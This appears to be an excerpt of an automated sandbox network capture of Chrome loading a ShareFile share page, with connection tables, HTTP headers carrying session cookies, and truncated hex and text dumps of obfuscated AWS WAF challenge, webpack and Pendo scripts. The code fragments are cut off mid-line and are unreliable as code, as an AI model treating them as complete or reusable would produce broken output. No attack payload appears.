                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC16384INData Raw: 69 6e 20 65 29 7b 76 61 72 20 72 3d 65 5b 6e 5d 3b 74 3d 4d 61 74 68 2e 6d 61 78 28 74 2c 72 29 7d 72 65 74 75 72 6e 20 74 7d 7d 5d 29 2c 65 7d 28 29 3b 66 75 6e 63 74 69 6f 6e 20 73 74 28 65 2c 74 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 72 3d 72 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 74 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 6e 2e 70 75 73 68 2e 61
                                                                                                                                                                                                                      Data Ascii: in e){var r=e[n];t=Math.max(t,r)}return t}}]),e}();function st(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.a


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      9192.168.2.174972313.248.193.2514437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:03 UTC1272OUTGET /bundles/7ba6967109e88a8ecd8d.js HTTP/1.1
                                                                                                                                                                                                                      Host: averellharriman.sharefile.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Referer: https://averellharriman.sharefile.com/public/share/web-s3b96c17360cd43e7bdcaf25a23709fd0
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      Cookie: AWSALBTG=V4Uy/vVBcH1KZLJdU1G/GZuvhpTkAwVKo4BSkkEwiKndEcp2fmKOLA+obOjdnruGE8q8vIC9PE9kD99pBerMAWOeOkTPQtGEWKiKFDNWl/PVIymzs0TOpij+BDM/x07yTEult5lpPkSbNdvGAPh0Sg1cwPPZ3NyNJN1fQdKUgL2I; AWSALBTGCORS=V4Uy/vVBcH1KZLJdU1G/GZuvhpTkAwVKo4BSkkEwiKndEcp2fmKOLA+obOjdnruGE8q8vIC9PE9kD99pBerMAWOeOkTPQtGEWKiKFDNWl/PVIymzs0TOpij+BDM/x07yTEult5lpPkSbNdvGAPh0Sg1cwPPZ3NyNJN1fQdKUgL2I; AWSALB=G7T03R2S2KszJi0/6BTjZcVJzhKk1LdzYpO5txWiAg9B//nwV86yVu/xCPh1piTnQN/5Ck6WUZJhliVeDzDB1AaZyIeSPTIYQlWDTtTQ2wA4E3q0qWyFKtDUXZ3R; AWSALBCORS=G7T03R2S2KszJi0/6BTjZcVJzhKk1LdzYpO5txWiAg9B//nwV86yVu/xCPh1piTnQN/5Ck6WUZJhliVeDzDB1AaZyIeSPTIYQlWDTtTQ2wA4E3q0qWyFKtDUXZ3R
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC1429INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:03 GMT
                                                                                                                                                                                                                      Content-Type: application/javascript
                                                                                                                                                                                                                      Content-Length: 5339
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: AWSALBTG=5FGP81tyGxUNz5m4yQ4dBH7FyGFSacBlWPJd+6nCxzunFfuHEAACT5kpbNDA3WRYWTZa052JrcNskLZKkikbe2c4j74yUaXW0XvhKa1yRmMOV29m3jaNq7YpDSd74dUx+y8rh15a/vdAAlS1PNUwip+/QfSneqwnoSLNuWaibxVb; Expires=Tue, 12 Nov 2024 19:36:03 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBTGCORS=5FGP81tyGxUNz5m4yQ4dBH7FyGFSacBlWPJd+6nCxzunFfuHEAACT5kpbNDA3WRYWTZa052JrcNskLZKkikbe2c4j74yUaXW0XvhKa1yRmMOV29m3jaNq7YpDSd74dUx+y8rh15a/vdAAlS1PNUwip+/QfSneqwnoSLNuWaibxVb; Expires=Tue, 12 Nov 2024 19:36:03 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Set-Cookie: AWSALB=gARLScAFO8trFu6DtZItKILC30QADn78brlDMvoUsb50V9llc0LJJTY7j3xxsb6s7fAzVY9vVXbtcnV0Rid83Jbcrcx071xkxmZMXbKaWWlsC4rCsTk1XjfcVrRw; Expires=Tue, 12 Nov 2024 19:36:03 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBCORS=gARLScAFO8trFu6DtZItKILC30QADn78brlDMvoUsb50V9llc0LJJTY7j3xxsb6s7fAzVY9vVXbtcnV0Rid83Jbcrcx071xkxmZMXbKaWWlsC4rCsTk1XjfcVrRw; Expires=Tue, 12 Nov 2024 19:36:03 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Cache-Control: no-store, must-revalidate, no-cache, private
                                                                                                                                                                                                                      Content-Language: en
                                                                                                                                                                                                                      ETag: "1db2f60e56c3b5b"
                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                      Last-Modified: Tue, 05 Nov 2024 08:58:35 GMT
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Referrer-Policy: same-origin
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=16000000;includeSubDomains;preload
                                                                                                                                                                                                                      X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC5339INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 68 61 72 65 66 69 6c 65 64 65 76 5f 73 68 61 72 65 66 69 6c 65 5f 61 70 70 73 68 65 6c 6c 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 68 61 72 65 66 69 6c 65 64 65 76 5f 73 68 61 72 65 66 69 6c 65 5f 61 70 70 73 68 65 6c 6c 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 38 36 33 5d 2c 7b 36 36 35 33 33 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 6f 29 7b 76 61 72 20 65 3d 6f 28 38 30 38 31 29 2c 66 3d 6f 28 32 33 36 34 35 29 2c 72 3d 6f 28 36 31 36 36 37 29 2c 69 3d 6f 28 34 34 35 35 30 29 2c 61 3d 6f 28 31 37 39 37 29 2c 73 3d 6f 28 38 35 34 39 33 29 2c 63 3d 6f 28 36 36 34 30 36 29 2c 6c 3d 6f 28 32 36 30 38 32 29 2c 70 3d 6f 28 34 34 30 39 33 29 2c 75 3d 6f 28 33 35 37 31 35 29 2c 64
                                                                                                                                                                                                                      Data Ascii: (self.webpackChunk_sharefiledev_sharefile_appshell=self.webpackChunk_sharefiledev_sharefile_appshell||[]).push([[1863],{66533:function(n,t,o){var e=o(8081),f=o(23645),r=o(61667),i=o(44550),a=o(1797),s=o(85493),c=o(66406),l=o(26082),p=o(44093),u=o(35715),d


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      10192.168.2.174972118.245.175.1004437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:03 UTC410OUTGET /0093b71e39a6/478ed03bbf12/challenge.js HTTP/1.1
                                                                                                                                                                                                                      Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC572INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: text/javascript
                                                                                                                                                                                                                      Content-Length: 1099135
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:04 GMT
                                                                                                                                                                                                                      x-amzn-waf-challenge-id: Root=1-672a73a4-474bfdf71b3459986232827d
                                                                                                                                                                                                                      cache-control: private, max-age=86400, stale-while-revalidate=604800
                                                                                                                                                                                                                      last-modified: Tue, 5 Nov 2024 19:36:04 +0000
                                                                                                                                                                                                                      pragma: no-cache
                                                                                                                                                                                                                      expires: 0
                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                      Via: 1.1 b033cb8a3dd705c651c0261364bd49b2.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: CDG55-P1
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      X-Amz-Cf-Id: TAEFPMU6cj0ZztHJWW6l8y3_tMNhHDxcAF2H3jMam5Sk2a8VbqYIEg==
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC7842INData Raw: 76 61 72 20 61 30 5f 30 78 34 39 62 37 3d 5b 27 4d 41 58 5f 41 47 45 5f 53 45 43 4f 4e 44 53 27 2c 27 7b 32 38 33 38 30 37 42 35 2d 32 43 36 30 2d 31 31 44 30 2d 41 33 31 44 2d 30 30 41 41 30 30 42 39 32 43 30 33 7d 27 2c 27 73 74 61 72 74 44 65 63 72 79 70 74 69 6e 67 27 2c 27 73 69 67 6e 65 64 44 61 74 61 56 61 6c 69 64 61 74 6f 72 27 2c 27 43 6f 75 6c 64 5c 78 32 30 6e 6f 74 5c 78 32 30 63 6f 6d 70 75 74 65 5c 78 32 30 63 65 72 74 69 66 69 63 61 74 65 5c 78 32 30 64 69 67 65 73 74 2e 5c 78 32 30 55 6e 6b 6e 6f 77 6e 5c 78 32 30 6d 65 73 73 61 67 65 5c 78 32 30 64 69 67 65 73 74 5c 78 32 30 61 6c 67 6f 72 69 74 68 6d 5c 78 32 30 4f 49 44 2e 27 2c 27 4c 65 66 74 6d 6f 73 74 5c 78 32 30 6f 63 74 65 74 73 5c 78 32 30 6e 6f 74 5c 78 32 30 7a 65 72 6f 5c 78
                                                                                                                                                                                                                      Data Ascii: var a0_0x49b7=['MAX_AGE_SECONDS','{283807B5-2C60-11D0-A31D-00AA00B92C03}','startDecrypting','signedDataValidator','Could\x20not\x20compute\x20certificate\x20digest.\x20Unknown\x20message\x20digest\x20algorithm\x20OID.','Leftmost\x20octets\x20not\x20zero\x
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC16384INData Raw: 61 70 52 73 61 50 72 69 76 61 74 65 4b 65 79 27 2c 27 4f 43 52 5c 78 32 30 41 5c 78 32 30 45 78 74 65 6e 64 65 64 27 2c 27 54 61 68 6f 6d 61 27 2c 27 70 75 62 6c 69 63 4b 65 79 45 78 70 6f 6e 65 6e 74 27 2c 27 73 65 74 41 74 74 72 69 62 75 74 65 73 27 2c 27 43 4f 4c 4c 45 43 54 4f 52 53 27 2c 27 45 72 61 73 5c 78 32 30 42 6f 6c 64 5c 78 32 30 49 54 43 27 2c 27 43 6f 75 6c 64 5c 78 32 30 6e 6f 74 5c 78 32 30 70 61 72 73 65 5c 78 32 30 63 65 72 74 69 66 69 63 61 74 65 5c 78 32 30 6c 69 73 74 2e 27 2c 27 68 61 6e 64 6c 65 46 69 6e 69 73 68 65 64 27 2c 27 61 70 70 6c 79 27 2c 27 33 37 74 79 79 50 4f 56 27 2c 27 6d 65 73 73 61 67 65 4c 65 6e 67 74 68 27 2c 27 5c 78 32 30 28 55 54 46 38 29 27 2c 27 49 6e 76 61 6c 69 64 5c 78 32 30 4b 65 79 2e 27 2c 27 64 65 72
                                                                                                                                                                                                                      Data Ascii: apRsaPrivateKey','OCR\x20A\x20Extended','Tahoma','publicKeyExponent','setAttributes','COLLECTORS','Eras\x20Bold\x20ITC','Could\x20not\x20parse\x20certificate\x20list.','handleFinished','apply','37tyyPOV','messageLength','\x20(UTF8)','Invalid\x20Key.','der
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC9730INData Raw: 32 30 6f 72 5c 78 32 30 27 2c 27 5c 78 32 32 2c 5c 78 32 30 74 79 70 65 5c 78 32 30 5c 78 32 32 27 2c 27 73 65 74 75 70 56 42 53 63 72 69 70 74 27 2c 27 43 65 72 74 42 61 67 2e 63 65 72 74 56 61 6c 75 65 5b 30 5d 27 2c 27 6d 6f 64 49 6e 76 65 72 73 65 27 2c 27 4e 69 61 67 61 72 61 5c 78 32 30 45 6e 67 72 61 76 65 64 27 2c 27 54 68 72 6f 74 74 6c 65 72 27 2c 27 70 65 6d 54 6f 44 65 72 27 2c 27 70 6f 70 27 2c 27 63 72 65 61 74 65 42 75 66 66 65 72 27 2c 27 68 61 6e 64 6c 65 43 65 72 74 69 66 69 63 61 74 65 56 65 72 69 66 79 27 2c 27 63 68 61 6c 6c 65 6e 67 65 50 61 73 73 77 6f 72 64 27 2c 27 63 65 72 74 69 66 69 63 61 74 65 46 72 6f 6d 50 65 6d 27 2c 27 4d 6f 6e 6f 73 70 61 63 38 32 31 5c 78 32 30 42 54 27 2c 27 70 72 6f 66 69 6c 65 27 2c 27 5c 78 32 30 62
                                                                                                                                                                                                                      Data Ascii: 20or\x20','\x22,\x20type\x20\x22','setupVBScript','CertBag.certValue[0]','modInverse','Niagara\x20Engraved','Throttler','pemToDer','pop','createBuffer','handleCertificateVerify','challengePassword','certificateFromPem','Monospac821\x20BT','profile','\x20b
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC16384INData Raw: 5c 78 32 30 53 74 64 27 2c 27 3b 5c 78 32 30 63 68 65 63 6b 73 75 6d 3a 5c 78 32 30 27 2c 27 68 6d 61 63 27 2c 27 61 64 64 4c 6f 67 67 65 72 27 2c 27 55 6e 73 75 70 70 6f 72 74 65 64 5c 78 32 30 63 65 72 74 69 66 69 63 61 74 65 2e 27 2c 27 72 65 70 6c 61 63 65 27 2c 27 6b 65 79 55 73 61 67 65 52 65 73 74 72 69 63 74 69 6f 6e 27 2c 27 46 75 6e 63 74 69 6f 6e 5c 78 32 30 64 41 58 50 28 6e 2c 5c 78 32 30 76 29 5c 78 30 61 6f 6e 5c 78 32 30 65 72 72 6f 72 5c 78 32 30 72 65 73 75 6d 65 5c 78 32 30 6e 65 78 74 5c 78 30 61 73 65 74 5c 78 32 30 6f 5c 78 32 30 3d 5c 78 32 30 43 72 65 61 74 65 4f 62 6a 65 63 74 28 76 29 5c 78 30 61 49 66 5c 78 32 30 49 73 4f 62 6a 65 63 74 28 6f 29 5c 78 32 30 54 68 65 6e 5c 78 30 61 53 65 6c 65 63 74 5c 78 32 30 63 61 73 65 5c 78
                                                                                                                                                                                                                      Data Ascii: \x20Std',';\x20checksum:\x20','hmac','addLogger','Unsupported\x20certificate.','replace','keyUsageRestriction','Function\x20dAXP(n,\x20v)\x0aon\x20error\x20resume\x20next\x0aset\x20o\x20=\x20CreateObject(v)\x0aIf\x20IsObject(o)\x20Then\x0aSelect\x20case\x
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC16384INData Raw: 27 64 69 66 66 69 63 75 6c 74 79 27 2c 27 47 6f 74 68 69 63 45 27 2c 27 5f 5f 72 65 73 74 27 2c 27 38 33 35 4b 76 4d 4e 7a 43 27 2c 27 42 61 74 61 6e 67 27 2c 27 2f 61 2f 27 2c 27 52 65 63 69 70 69 65 6e 74 49 6e 66 6f 2e 69 73 73 75 65 72 41 6e 64 53 65 72 69 61 6c 2e 69 73 73 75 65 72 27 2c 27 65 78 70 69 72 65 73 3d 27 2c 27 61 75 74 68 6f 72 69 74 79 4b 65 79 49 64 65 6e 74 69 66 69 65 72 27 2c 27 73 65 72 76 65 72 5f 77 72 69 74 65 5f 6b 65 79 27 2c 27 41 45 53 2d 32 35 36 2d 43 42 43 27 2c 27 54 69 6d 65 73 5c 78 32 30 4e 65 77 5c 78 32 30 52 6f 6d 61 6e 5c 78 32 30 43 79 72 27 2c 27 63 6c 69 65 6e 74 43 65 72 74 69 66 69 63 61 74 65 27 2c 27 62 61 73 69 63 43 6f 6e 73 74 72 61 69 6e 74 73 27 2c 27 64 65 6c 74 61 58 27 2c 27 63 65 72 74 53 75 62 6a
                                                                                                                                                                                                                      Data Ascii: 'difficulty','GothicE','__rest','835KvMNzC','Batang','/a/','RecipientInfo.issuerAndSerial.issuer','expires=','authorityKeyIdentifier','server_write_key','AES-256-CBC','Times\x20New\x20Roman\x20Cyr','clientCertificate','basicConstraints','deltaX','certSubj
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC16384INData Raw: 29 5f 30 78 31 39 66 65 39 65 5b 5f 30 78 31 61 36 38 30 65 28 30 78 35 34 33 29 5d 28 5f 30 78 31 65 39 65 33 65 5b 5f 30 78 35 34 63 66 30 65 5d 29 3c 30 78 30 26 26 4f 62 6a 65 63 74 5b 5f 30 78 31 61 36 38 30 65 28 30 78 36 34 62 29 5d 5b 27 70 72 6f 70 65 72 74 79 49 73 45 6e 75 6d 65 72 61 62 6c 65 27 5d 5b 5f 30 78 31 61 36 38 30 65 28 30 78 32 34 38 29 5d 28 5f 30 78 34 65 61 66 62 30 2c 5f 30 78 31 65 39 65 33 65 5b 5f 30 78 35 34 63 66 30 65 5d 29 26 26 28 5f 30 78 34 38 38 34 35 61 5b 5f 30 78 31 65 39 65 33 65 5b 5f 30 78 35 34 63 66 30 65 5d 5d 3d 5f 30 78 34 65 61 66 62 30 5b 5f 30 78 31 65 39 65 33 65 5b 5f 30 78 35 34 63 66 30 65 5d 5d 29 3b 7d 72 65 74 75 72 6e 20 5f 30 78 34 38 38 34 35 61 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 32 36
                                                                                                                                                                                                                      Data Ascii: )_0x19fe9e[_0x1a680e(0x543)](_0x1e9e3e[_0x54cf0e])<0x0&&Object[_0x1a680e(0x64b)]['propertyIsEnumerable'][_0x1a680e(0x248)](_0x4eafb0,_0x1e9e3e[_0x54cf0e])&&(_0x48845a[_0x1e9e3e[_0x54cf0e]]=_0x4eafb0[_0x1e9e3e[_0x54cf0e]]);}return _0x48845a;}function _0x26
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC16384INData Raw: 74 68 69 73 5b 5f 30 78 32 38 34 62 32 65 5b 30 78 32 5d 5d 5b 5f 30 78 32 31 61 37 30 30 5d 3b 72 65 74 75 72 6e 20 5f 30 78 32 38 34 62 32 65 5b 30 78 36 5d 5e 5f 30 78 35 32 37 31 37 61 3b 7d 2c 5f 30 78 31 66 66 30 66 31 5b 5f 30 78 33 32 61 36 33 35 5b 30 78 30 5d 5d 3d 5f 30 78 33 32 61 36 33 35 5b 30 78 36 5d 2c 5f 30 78 31 66 66 30 66 31 3b 7d 28 29 3b 5f 30 78 35 37 35 66 64 33 5b 5f 30 78 33 36 63 61 34 35 28 30 78 61 38 33 29 5d 3d 5f 30 78 31 33 35 33 64 33 3b 7d 2c 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 62 61 62 32 62 2c 5f 30 78 31 36 65 39 37 61 2c 5f 30 78 33 63 37 32 34 39 29 7b 27 75 73 65 20 73 74 72 69 63 74 27 3b 76 61 72 20 5f 30 78 31 31 31 63 37 64 3d 61 30 5f 30 78 33 62 31 62 3b 5f 30 78 31 36 65 39 37 61 5b 27 5f 5f 65 73 4d 6f
                                                                                                                                                                                                                      Data Ascii: this[_0x284b2e[0x2]][_0x21a700];return _0x284b2e[0x6]^_0x52717a;},_0x1ff0f1[_0x32a635[0x0]]=_0x32a635[0x6],_0x1ff0f1;}();_0x575fd3[_0x36ca45(0xa83)]=_0x1353d3;},function(_0x2bab2b,_0x16e97a,_0x3c7249){'use strict';var _0x111c7d=a0_0x3b1b;_0x16e97a['__esMo
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC16384INData Raw: 62 37 35 65 61 5b 5f 30 78 33 32 62 34 63 66 5b 30 78 37 5d 5d 5b 5f 30 78 33 32 62 34 63 66 5b 30 78 63 5d 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 34 33 66 31 61 64 3d 5f 30 78 32 34 34 34 63 63 2c 5f 30 78 35 61 62 31 35 62 3d 5b 5f 30 78 34 33 66 31 61 64 28 30 78 32 36 35 29 2c 5f 30 78 34 33 66 31 61 64 28 30 78 37 38 38 29 2c 5f 30 78 34 33 66 31 61 64 28 30 78 35 31 34 29 2c 5f 30 78 34 33 66 31 61 64 28 30 78 62 38 39 29 2c 5f 30 78 34 33 66 31 61 64 28 30 78 61 38 33 29 2c 5f 30 78 34 33 66 31 61 64 28 30 78 37 65 30 29 2c 5f 30 78 34 33 66 31 61 64 28 30 78 38 33 61 29 2c 5f 30 78 34 33 66 31 61 64 28 30 78 35 63 64 29 5d 2c 5f 30 78 31 64 31 34 36 61 3d 74 68 69 73 2c 5f 30 78 37 35 66 33 66 63 3d 6e 65 77 20 5f 30 78 32 65
                                                                                                                                                                                                                      Data Ascii: b75ea[_0x32b4cf[0x7]][_0x32b4cf[0xc]]=function(){var _0x43f1ad=_0x2444cc,_0x5ab15b=[_0x43f1ad(0x265),_0x43f1ad(0x788),_0x43f1ad(0x514),_0x43f1ad(0xb89),_0x43f1ad(0xa83),_0x43f1ad(0x7e0),_0x43f1ad(0x83a),_0x43f1ad(0x5cd)],_0x1d146a=this,_0x75f3fc=new _0x2e
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC16384INData Raw: 5b 30 78 30 5d 2c 27 53 57 44 4e 45 57 27 3a 5f 30 78 33 64 30 31 39 39 5b 30 78 31 32 5d 2c 27 44 4f 54 4e 45 54 46 4d 27 3a 5f 30 78 33 64 30 31 39 39 5b 30 78 64 5d 2c 27 4d 44 46 48 27 3a 5f 30 78 33 64 30 31 39 39 5b 30 78 66 5d 2c 27 46 4c 48 27 3a 5f 30 78 33 64 30 31 39 39 5b 30 78 32 31 5d 2c 27 53 57 27 3a 5f 30 78 33 64 30 31 39 39 5b 30 78 31 35 5d 2c 27 53 57 44 27 3a 5f 30 78 33 64 30 31 39 39 5b 30 78 65 5d 2c 27 52 50 27 3a 5f 30 78 33 64 30 31 39 39 5b 30 78 31 64 5d 2c 27 51 54 27 3a 5f 30 78 33 64 30 31 39 39 5b 30 78 63 5d 7d 2c 5f 30 78 34 31 36 65 34 37 3b 7d 28 29 3b 5f 30 78 31 33 61 35 65 61 5b 5f 30 78 34 66 38 65 64 64 28 30 78 61 38 33 29 5d 3d 5f 30 78 32 64 36 61 62 65 3b 7d 2c 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 31 65 63
                                                                                                                                                                                                                      Data Ascii: [0x0],'SWDNEW':_0x3d0199[0x12],'DOTNETFM':_0x3d0199[0xd],'MDFH':_0x3d0199[0xf],'FLH':_0x3d0199[0x21],'SW':_0x3d0199[0x15],'SWD':_0x3d0199[0xe],'RP':_0x3d0199[0x1d],'QT':_0x3d0199[0xc]},_0x416e47;}();_0x13a5ea[_0x4f8edd(0xa83)]=_0x2d6abe;},function(_0x41ec
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC16384INData Raw: 34 64 62 38 39 35 28 30 78 36 34 62 29 2c 5f 30 78 34 64 62 38 39 35 28 30 78 36 61 33 29 2c 27 73 75 70 70 6f 72 74 73 57 65 62 43 72 79 70 74 6f 53 75 62 74 6c 65 27 5d 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 32 33 30 65 62 39 28 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 30 32 38 35 63 5b 30 78 31 5d 21 3d 3d 5f 30 78 32 62 66 61 30 35 26 26 5f 30 78 32 62 66 61 30 35 5b 5f 30 78 32 30 32 38 35 63 5b 30 78 36 5d 5d 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7c 7c 74 68 69 73 3b 7d 72 65 74 75 72 6e 28 30 78 30 2c 5f 30 78 64 38 32 66 36 32 5b 5f 30 78 32 30 32 38 35 63 5b 30 78 35 5d 5d 29 28 5f 30 78 32 33 30 65 62 39 2c 5f 30 78 32 62 66 61 30 35 29 2c 5f 30 78 32 33 30 65 62 39 5b 5f 30 78 32 30 32 38 35 63 5b 30 78 38 5d 5d 5b 5f 30 78 32 30 32 38
                                                                                                                                                                                                                      Data Ascii: 4db895(0x64b),_0x4db895(0x6a3),'supportsWebCryptoSubtle'];function _0x230eb9(){return _0x20285c[0x1]!==_0x2bfa05&&_0x2bfa05[_0x20285c[0x6]](this,arguments)||this;}return(0x0,_0xd82f62[_0x20285c[0x5]])(_0x230eb9,_0x2bfa05),_0x230eb9[_0x20285c[0x8]][_0x2028


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      11192.168.2.174972534.111.138.514437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:03 UTC564OUTGET /agent/static/74b07336-7560-45fc-7cd1-95032a784d52/pendo.js HTTP/1.1
                                                                                                                                                                                                                      Host: citrix-sharefile-content.customer.pendo.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC907INHTTP/1.1 200 OK
                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                      access-control-expose-headers: *
                                                                                                                                                                                                                      cache-control: max-age=450
                                                                                                                                                                                                                      content-type: application/javascript; charset=utf-8
                                                                                                                                                                                                                      date: Tue, 05 Nov 2024 19:36:04 GMT
                                                                                                                                                                                                                      etag: "a6eb6d7786e63381cda336fccca1556e"
                                                                                                                                                                                                                      expires: Tue, 05 Nov 2024 19:43:34 GMT
                                                                                                                                                                                                                      last-modified: Tue, 05 Nov 2024 19:15:29 GMT
                                                                                                                                                                                                                      server: istio-envoy
                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                      x-goog-generation: 1730834129684014
                                                                                                                                                                                                                      x-goog-hash: crc32c=kMzVNA==
                                                                                                                                                                                                                      x-goog-hash: md5=puttd4bmM4HNozb8zKFVbg==
                                                                                                                                                                                                                      x-goog-metageneration: 1
                                                                                                                                                                                                                      x-goog-storage-class: STANDARD
                                                                                                                                                                                                                      x-goog-stored-content-encoding: gzip
                                                                                                                                                                                                                      x-goog-stored-content-length: 165113
                                                                                                                                                                                                                      x-guploader-uploadid: AHmUCY1LOCYlz8g38LsdcW7v6-aodFwCUbW4jmrd_QQhzZhK0ZXjXOcYCFyDWPXsPjEds7ht21IHopx_Uw
                                                                                                                                                                                                                      x-envoy-upstream-service-time: 37
                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=63072000
                                                                                                                                                                                                                      Alt-Svc: clear
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Transfer-Encoding: chunked
